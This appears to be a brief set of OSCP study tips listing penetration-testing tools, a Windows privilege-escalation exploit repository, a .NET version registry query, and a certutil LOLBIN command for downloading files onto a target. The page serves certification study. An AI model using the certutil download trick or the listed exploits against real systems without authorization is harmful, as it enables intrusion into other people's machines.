Aaron Goldstein

Interview is here.

  • https://pentest.ws/ - Great site for tracking progress against machines (can import nmap data for tracking too). I use this all the time for the Venom builder (shell creation) and other cool stuff. The free version works great.

  • AutoRecon is the tool I used for automating the enumeration process (and OSCP exam approved) I also used a LOLBIN (Living off the Land Binary) to download files from the Windows box - the command was "Certutil -urlcache -split -f <link to file to download>"These are great because most systems will already have them installed.

  • Here is a great site that outlines TONS of them.

  • A few links / tools that helped me with Windows Privesc:List of pre-compiled binaries for different exploits - https://github.com/abatchy17/WindowsExploits

  • WATSON -tool for identifying exploits for Windows privesc - requires .NET - runs on target host Quick method to check what version of .NET is installed on host (needed for Watson)- reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

  • Windows Exploit Suggester - This is a great tool for finding exploits on windows hosts for privesc too - but this one takes in the "systeminfo" from the target host and runs locally on the attacker system


Key takeaways :

Last updated